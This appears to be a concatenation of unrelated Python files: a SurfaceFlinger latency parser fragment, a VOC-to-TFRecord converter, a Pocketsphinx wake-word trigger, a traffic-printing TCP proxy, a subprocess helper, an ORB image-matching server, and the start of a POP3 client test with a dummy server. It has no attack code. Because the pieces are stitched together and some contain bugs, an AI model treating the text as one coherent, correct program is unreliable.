# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
#
# We use the special "SurfaceView" window name because the statistics for
# the activity's main window are not updated when the main web content is
# composited into a SurfaceView.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency SurfaceView')
if not len(results):
return (None, None)
timestamps = []
nanoseconds_per_millisecond = 1e6
refresh_period = long(results[0]) / nanoseconds_per_millisecond
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# Since we only care about completed frames, we will ignore any timestamps
# with this value.
pending_fence_timestamp = (1 << 63) - 1
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = long(fields[1])
if timestamp == pending_fence_timestamp:
continue
timestamp /= nanoseconds_per_millisecond
timestamps.append(timestamp)
return (refresh_period, timestamps)
|
convert_tfrecords.py
|
# Copyright 2018 Changan Wang
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import xml.etree.ElementTree as xml_tree
import numpy as np
import six
import tensorflow as tf
import dataset_common
'''How to organize your dataset folder:
VOCROOT/
|->VOC2007/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2012/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2007TEST/
| |->Annotations/
| |->...
'''
tf.app.flags.DEFINE_string('dataset_directory', '/media/rs/7A0EE8880EE83EAF/Detections/PASCAL/VOC',
'All datas directory')
tf.app.flags.DEFINE_string('train_splits', 'VOC2007, VOC2012',
'Comma-separated list of the training data sub-directory')
tf.app.flags.DEFINE_string('validation_splits', 'VOC2007TEST',
'Comma-separated list of the validation data sub-directory')
tf.app.flags.DEFINE_string('output_directory', '/media/rs/7A0EE8880EE83EAF/Detections/SSD/dataset/tfrecords',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 16,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 16,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
RANDOM_SEED = 180428
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_list_feature(value):
"""Wrapper for inserting a list of bytes features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if isinstance(value, six.string_types):
value = six.binary_type(value, encoding='utf-8')
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_name, image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
bboxes: List of bounding boxes for each image
labels: List of labels for bounding box
labels_text: List of labels' name for bounding box
difficult: List of ints indicate the difficulty of that bounding box
truncated: List of ints indicate the truncation of that bounding box
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
ymin = []
xmin = []
ymax = []
xmax = []
for b in bboxes:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([ymin, xmin, ymax, xmax], b)]
# pylint: enable=expression-not-assigned
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/channels': _int64_feature(channels),
'image/shape': _int64_feature([height, width, channels]),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(labels),
'image/object/bbox/label_text': _bytes_list_feature(labels_text),
'image/object/bbox/difficult': _int64_feature(difficult),
'image/object/bbox/truncated': _int64_feature(truncated),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(image_name.encode('utf8')),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _find_image_bounding_boxes(directory, cur_record):
"""Find the bounding boxes for a given image file.
Args:
directory: string; the path of all datas.
cur_record: list of strings; the first of which is the sub-directory of cur_record, the second is the image filename.
Returns:
bboxes: List of bounding boxes for each image.
labels: List of labels for bounding box.
labels_text: List of labels' name for bounding box.
difficult: List of ints indicate the difficulty of that bounding box.
truncated: List of ints indicate the truncation of that bounding box.
"""
anna_file = os.path.join(directory, cur_record[0], 'Annotations', cur_record[1].replace('jpg', 'xml'))
tree = xml_tree.parse(anna_file)
root = tree.getroot()
# Image shape.
size = root.find('size')
shape = [int(size.find('height').text),
int(size.find('width').text),
int(size.find('depth').text)]
# Find annotations.
bboxes = []
labels = []
labels_text = []
difficult = []
truncated = []
for obj in root.findall('object'):
label = obj.find('name').text
labels.append(int(dataset_common.VOC_LABELS[label][0]))
labels_text.append(label.encode('ascii'))
isdifficult = obj.find('difficult')
if isdifficult is not None:
difficult.append(int(isdifficult.text))
else:
difficult.append(0)
istruncated = obj.find('truncated')
if istruncated is not None:
truncated.append(int(istruncated.text))
else:
truncated.append(0)
bbox = obj.find('bndbox')
bboxes.append((float(bbox.find('ymin').text) / shape[0],
float(bbox.find('xmin').text) / shape[1],
float(bbox.find('ymax').text) / shape[0],
float(bbox.find('xmax').text) / shape[1]
))
return bboxes, labels, labels_text, difficult, truncated
def _process_image_files_batch(coder, thread_index, ranges, name, directory, all_records, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
directory: string; the path of all datas
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
cur_record = all_records[i]
filename = os.path.join(directory, cur_record[0], 'JPEGImages', cur_record[1])
bboxes, labels, labels_text, difficult, truncated = _find_image_bounding_boxes(directory, cur_record)
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, cur_record[1], image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, directory, all_records, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
directory: string; the path of all datas
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(all_records), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, directory, all_records, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(all_records)))
sys.stdout.flush()
def _process_dataset(name, directory, all_splits, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
all_splits: list of strings, sub-path to the data set.
num_shards: integer number of shards for this data set.
"""
all_records = []
for split in all_splits:
jpeg_file_path = os.path.join(directory, split, 'JPEGImages')
images = tf.gfile.ListDirectory(jpeg_file_path)
jpegs = [im_name for im_name in images if im_name.strip()[-3:]=='jpg']
all_records.extend(list(zip([split] * len(jpegs), jpegs)))
shuffled_index = list(range(len(all_records)))
random.seed(RANDOM_SEED)
random.shuffle(shuffled_index)
all_records = [all_records[i] for i in shuffled_index]
_process_image_files(name, directory, all_records, num_shards)
def parse_comma_list(args):
return [s.strip() for s in args.split(',')]
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('val', FLAGS.dataset_directory, parse_comma_list(FLAGS.validation_splits), FLAGS.validation_shards)
_process_dataset('train', FLAGS.dataset_directory, parse_comma_list(FLAGS.train_splits), FLAGS.train_shards)
if __name__ == '__main__':
tf.app.run()
|
pocketsphinxtrigger.py
|
import os
import threading
import logging
import platform
from pocketsphinx import get_model_path
from pocketsphinx.pocketsphinx import Decoder
import alexapi.triggers as triggers
from .basetrigger import BaseTrigger
logger = logging.getLogger(__name__)
class PocketsphinxTrigger(BaseTrigger):
type = triggers.TYPES.VOICE
AUDIO_CHUNK_SIZE = 1024
AUDIO_RATE = 16000
_capture = None
def __init__(self, config, trigger_callback, capture):
super(PocketsphinxTrigger, self).__init__(config, trigger_callback, 'pocketsphinx')
self._capture = capture
self._enabled_lock = threading.Event()
# self._disabled_sync_lock = threading.Event()
self._decoder = None
def setup(self):
# PocketSphinx configuration
ps_config = Decoder.default_config()
# Set recognition model to US
ps_config.set_string('-hmm', os.path.join(get_model_path(), 'en-us'))
ps_config.set_string('-dict', os.path.join(get_model_path(), 'cmudict-en-us.dict'))
# Specify recognition key phrase
ps_config.set_string('-keyphrase', self._tconfig['phrase'])
ps_config.set_float('-kws_threshold', float(self._tconfig['threshold']))
# Hide the VERY verbose logging information when not in debug
if logging.getLogger('alexapi').getEffectiveLevel() != logging.DEBUG:
null_path = '/dev/null'
if platform.system() == 'Windows':
null_path = 'nul'
ps_config.set_string('-logfn', null_path)
# Process audio chunk by chunk. On keyword detected perform action and restart search
self._decoder = Decoder(ps_config)
def run(self):
thread = threading.Thread(target=self.thread, args=())
thread.setDaemon(True)
thread.start()
def thread(self):
while True:
self._enabled_lock.wait()
self._capture.handle_init(self.AUDIO_RATE, self.AUDIO_CHUNK_SIZE)
self._decoder.start_utt()
triggered = False
while not triggered:
if not self._enabled_lock.isSet():
break
# Read from microphone
data = self._capture.handle_read()
# Detect if keyword/trigger word was said
self._decoder.process_raw(data, False, False)
triggered = self._decoder.hyp() is not None
self._capture.handle_release()
self._decoder.end_utt()
if triggered:
self._trigger_callback(self)
def enable(self):
self._enabled_lock.set()
def disable(self):
self._enabled_lock.clear()
|
proxy.py
|
import socket, threading, sys, json
from enum import Enum
import hexdump
from colorama import Fore
import select
from .util import Direction, print_info, get_direction_label
from .proxy_config import load_config, ProxyConfig, ProxyItem
import time
from select import poll
running_proxies = {}
stop_proxies = False
config: ProxyConfig = None
def signal_handler(sig, frame):
global running_proxies
global stop_proxies
if running_proxies:
for proxy in running_proxies.values():
proxy.stop()
running_proxies.clear()
stop_proxies = True
sys.exit(0)
def start_from_config(configFile: str):
global config
config = load_config(configFile)
print("[*] loaded config for {} proxies".format(len(config.proxies)))
for proxy in config.proxies:
thread = threading.Thread(target=start_proxy, args=(proxy,))
thread.start()
def start_single_proxy(
local_port: int,
remote_port: int,
remote_host: str,
local_host: str = None,
verbosity: int = 0,
):
cfg = ProxyItem(
local_host, local_port, remote_host, remote_port, "SingleHost", verbosity
)
start_proxy(cfg)
def start_proxy(proxy_config: ProxyItem):
global running_proxies
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
remote_socket: socket.socket = None
try:
provider_config = config.providers[proxy_config.provider]
provider = provider_config.provider
if provider_config.depends_on and not provider.is_connected:
print(
f"[*] [{proxy_config.name}] checking that dependencies are met before connecting"
)
if not all(
elem in config.providers["initialized"]
for elem in provider_config.depends_on
):
print(
f"[!!] [{proxy_config.name}] not all dependencies are initialized"
)
sys.exit(1)
if not provider.initializing:
provider.connect()
else:
print(
f"[*] [{proxy_config.name}] waiting for provider {provider.name} to finish initializing"
)
while provider.initializing:
time.sleep(1)
server.bind((proxy_config.local_host, proxy_config.local_port))
print(f"[*] Listening on {proxy_config.local_host}:{proxy_config.local_port}")
except Exception as e:
print(
f"[!!] Failed to listen on {proxy_config.local_host}:{proxy_config.local_port}: {str(e)}"
)
print(e)
sys.exit(0)
server.listen()
global stop_proxies
while not stop_proxies:
client_socket, addr = server.accept()
proxy = Proxy(client_socket, proxy_config, remote_socket)
proxy.start()
running_proxies[proxy.name] = proxy
class Proxy:
def __init__(
self,
client_socket: socket.socket,
config: ProxyItem,
remote_host: socket.socket = None,
):
super().__init__()
self.name = "{}->{}:{}".format(
client_socket.getsockname(), config.remote_host, config.remote_port
)
self._local = client_socket
self._config = config
self._stop = False
if remote_host:
self._remote = remote_host
else:
self._remote_connect()
def start(self):
self._thread = threading.Thread(target=self._proxy_loop)
self._thread.start()
def stop(self):
if self.__stop:
return
self._stop = True
if self.__local:
self._local.close()
self._local = None
if self._remote:
self._remote.close()
self._remote = None
print(Fore.MAGENTA + "Disconnected " + self.name + Fore.RESET)
def _remote_connect(self):
global config
if self._config.provider:
provider_config = config.providers[self._config.provider]
provider = provider_config.provider
if not provider.is_connected:
print("[*] connection was deferred - connecting to provider now...")
provider.connect()
self._remote = provider.client_connect(
self._config.remote_host, self._config.remote_port, self._local
)
else:
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((self._config.remote_host, self._config.remote_port))
self._remote = remote_socket
def _proxy_loop(self):
poller = poll()
poller.register(self._local, select.POLLIN)
poller.register(self._remote, select.POLLIN)
try:
while True:
if self._stop or not self._remote or not self._local:
break
r, w, x = select.select([self._local, self._remote], [], [], 5.0)
# channels = poller.poll(5.0)
if self._local in r:
data = self._local.recv(1024)
if len(data) == 0:
break
print_info(data, Direction.REMOTE, self._config)
self._remote.send(data)
if self._remote in r:
data = self._remote.recv(1024)
if len(data) == 0:
break
print_info(data, Direction.LOCAL, self._config)
self._local.send(data)
except Exception:
import traceback
print(traceback.format_exc())
def _request_handler(self, buffer: str):
# perform any modifications bound for the remote host here
return buffer
def _response_handler(self, buffer: str):
# perform any modifictions bound for the local host here
return buffer
|
command.py
|
# -*- coding: UTF-8 -*-
# This file is part of the jetson_stats package (https://github.com/rbonghi/jetson_stats or http://rnext.it).
# Copyright (c) 2019 Raffaello Bonghi.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import logging
import threading
# Launch command
import subprocess as sp
# Load queue library for python 2 and python 3
try:
import queue
except ImportError:
import Queue as queue
# Create logger
logger = logging.getLogger(__name__)
EXTRA_TIMEOUT = 1.0
# Reference:
# https://eli.thegreenplace.net/2017/interacting-with-a-long-running-child-process-in-python/
# https://stackoverflow.com/questions/37942022/returncode-of-popen-object-is-none-after-the-process-is-terminated/42376107
# https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
# https://docs.python.org/3/tutorial/errors.html
# https://stackoverflow.com/questions/10756383/timeout-on-subprocess-readline-in-python
# https://stackoverflow.com/questions/3733270/python-subprocess-timeout
class Command(object):
class CommandException(Exception):
def __init__(self, message, errno):
self.message = message
self.errno = errno
def __str__(self):
return "[errno:{errno}] {message}".format(message=self.message, errno=self.errno)
class TimeoutException(CommandException):
def __init__(self):
super(Command.TimeoutException, self).__init__("Process does not replied in time", -1)
@staticmethod
def run_command(command, repeat=5, timeout=2):
cmd = Command(command)
for idx in range(repeat):
try:
return cmd(timeout=timeout)
except Command.TimeoutException as error:
logger.error("[{idx}] {error}".format(idx=idx, error=error))
raise Command.CommandException("Error to start {command}".format(command=command), -2)
def __init__(self, command):
self.process = None
self.command = command
def __call__(self, timeout=None):
def target(out_queue, err_queue):
# Run process
try:
# https://stackoverflow.com/questions/33277452/prevent-unexpected-stdin-reads-and-lock-in-subprocess
self.process = sp.Popen(self.command, stdout=sp.PIPE, stderr=sp.PIPE, stdin=open(os.devnull), preexec_fn=os.setsid)
# Read lines output
for line in iter(self.process.stdout.readline, b''):
line = line.decode('utf-8')
line = str(line.strip())
out_queue.put(line)
# Close and terminate
self.process.stdout.close()
self.process.wait()
except Exception:
# Store error message
err_queue.put(sys.exc_info())
# Initialize lists
is_timeout = False
out_queue = queue.Queue()
err_queue = queue.Queue()
thread = threading.Thread(target=target, args=(out_queue, err_queue, ))
thread.start()
# Wait timeout process
thread.join(timeout)
if thread.is_alive():
logger.error('Terminating process: {command}'.format(command=self.command))
if self.process is not None:
self.process.terminate()
thread.join(timeout=EXTRA_TIMEOUT)
logger.warning('Process terminated: {command}'.format(command=self.command))
is_timeout = True
# Read the output
# Extract exception and raise
if not err_queue.empty():
ex_type, ex_value, tb_str = err_queue.get()
ex_value.__traceback__ = tb_str
raise ex_value
if is_timeout:
raise Command.TimeoutException()
if self.process.returncode != 0:
raise Command.CommandException('Error process:', self.process.returncode)
return list(out_queue.queue)
def communicate(self, timeout=None):
self.__call__(timeout=timeout)
# EOF
|
mar_server.py
|
import socket, time, sys, struct, os
import cv2, pickle, threading
import numpy as np
from flask import request, url_for
from flask_api import FlaskAPI, status, exceptions
from os import listdir
from os.path import isfile, join
HOST = '0.0.0.0'
USER_PORT = 9001
REST_PORT = 10001
BUFFER_SIZE = 256
SIZE = 100 # number of comparing images
SOCKET_TIME_OUT = 10
INFOS = [0.1]
FOLDER = 'images/'
CWD = os.getcwd()
server = FlaskAPI(__name__)
@server.route("/", methods=['GET'])
def function():
global INFOS
useful_len = int(len(INFOS)*0.2) # last 80%
avg_data = np.mean(INFOS[useful_len:]) # get average
INFOS = [INFOS[-1]] # reset the data
return str(avg_data), status.HTTP_200_OK
def recv_image_from_socket(client):
start_time = time.time() # time when recv starts
buffers = b''
while len(buffers)<4:
try:
buf = client.recv(4-len(buffers))
except:
return False
buffers += buf
# if recv too long, then consider this user is disconnected
if time.time() - start_time >= SOCKET_TIME_OUT:
return False
size, = struct.unpack('!i', buffers)
#print "receiving %d bytes" % size
recv_data = b''
while len(recv_data) < size:
try:
data = client.recv(1024)
except:
return False
recv_data += data
# if recv too long, then consider this user is disconnected
if time.time() - start_time >= SOCKET_TIME_OUT:
return False
frame_data = recv_data[:size]
imgdata = np.frombuffer(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
def process(feature_extractor, matcher, image, database):
latent = feature_extractor.inference(image)
obj_id = sub_process_matching(latent, database, matcher)
return obj_id
class ORB:
def __init__(self,):
# Initiate ORB detector
self.orb = cv2.ORB_create()
# the default edgethreshold is 31, cannot detect keypoints
# which is not suitable for small cropped image
# reduce this value can apply to small image
def inference(self, img):
# find the keypoints with ORB
kp = self.orb.detect(img, None)
# compute the descriptors with ORB
kp, des = self.orb.compute(img, kp)
if des is None:
# if no feature detected, then randomly generated 100 features.
des = np.random.randint(0, 100, (100, 32), dtype=np.uint8)
des = des[:100] # max number of features
return des
def sub_process_matching(features, database, matcher):
# given an object (loc, latent), find the corresponding object in global_database
# the geo-distance should be smaller than NEARBY_DIST, and then find the minimum latent one
# if not found, then report a new object detected.
obj_id, min_aug_dist = 0, 1e9
for key, latent in database.items():
# where latent vector could be just a vector or a multi-vector due to orb detection
matches = matcher.match(latent, features) # store the latent dist
avg_distance = np.mean([match.distance for match in matches])
if avg_distance <= min_aug_dist: # if geo loc is nearby and aug-distance is smaller
min_aug_dist = avg_distance
obj_id = key
return obj_id
def start_rest_api():
server.run(host=HOST,port=REST_PORT)
print('completed!')
if __name__ == "__main__":
if len(sys.argv) == 1:
max_img_numbers = 100
elif len(sys.argv) == 2:
max_img_numbers = int(sys.argv[1])
else:
raise ValueError
# start rest api server
t1 = threading.Thread(target = start_rest_api)
t1.setDaemon(True)
t1.start()
# bind to port to accept client
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
# init some objects
feature_extractor = ORB()
matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
# global_database = {}
# # get all images
# images = [cv2.imread(FOLDER+f) for f in listdir(FOLDER) if isfile(join(FOLDER, f))]
# # save to global images
# for i, img in enumerate(images):
# latent = feature_extractor.inference(img)
# global_database[str(i)] = latent
# with open('global_database.pkl', 'wb') as handler:
# pickle.dump(global_database, handler)
#### handle different folders #####
try:
with open(CWD+'/global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
try:
with open(CWD+'/offloading_servers/global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
try:
with open(CWD+'offloading_servers/global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
try:
with open('global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
try:
with open('global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
database = {}
for key, val in global_database.items():
database[key] = val # get the value
if len(database)>=max_img_numbers: break
print('database length is ', len(database)) # if no global_database loaded, then report error
# main loop for all incoming client
while True:
print("waiting for client connection...")
client, addr = s.accept() # accept client
print ("Get new user socket")
StartTime = time.time()
# if client connected, keeping processing its data
while True:
decimg = recv_image_from_socket(client) # receive from client
if decimg is False:
print("client droped, break, waiting other clients")
break
ProcessTime = time.time()
match_id = process(feature_extractor, matcher, decimg, database) # process the img
latency = int(1000*(time.time() - StartTime))/1000 # ms level
print(latency, end=' ', flush=True) # print result
time.sleep(1) # sleep for 1 second and clean the radio channel buffer in case
INFOS.append(latency) # record info, latency
StartTime = time.time() # reset start time
str1 = str(match_id) + '\n' # prepare data
client.sendall(str1.encode()) # send back to client
client.close()
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import errno
from unittest import TestCase, skipUnless
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem")
requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported')
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']}
enable_UTF8 = False
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = False
self.tls_starting = False
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
def _get_capas(self):
_capas = dict(self.CAPAS)
if not self.tls_active and SUPPORTS_SSL:
_capas['STLS'] = []
return _capas
def cmd_capa(self, arg):
self.push('+OK Capability list follows')
if self._get_capas():
for cap, params in self._get_capas().items():
_ln = [cap]
if params:
_ln.extend(params)
self.push(' '.join(_ln))
self.push('.')
def cmd_utf8(self, arg):
self.push('+OK I know RFC6856'
if self.enable_UTF8
else '-ERR What is UTF8?!')
if SUPPORTS_SSL:
def cmd_stls(self, arg):
if self.tls_active is False:
self.push('+OK Begin TLS negotiation')
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
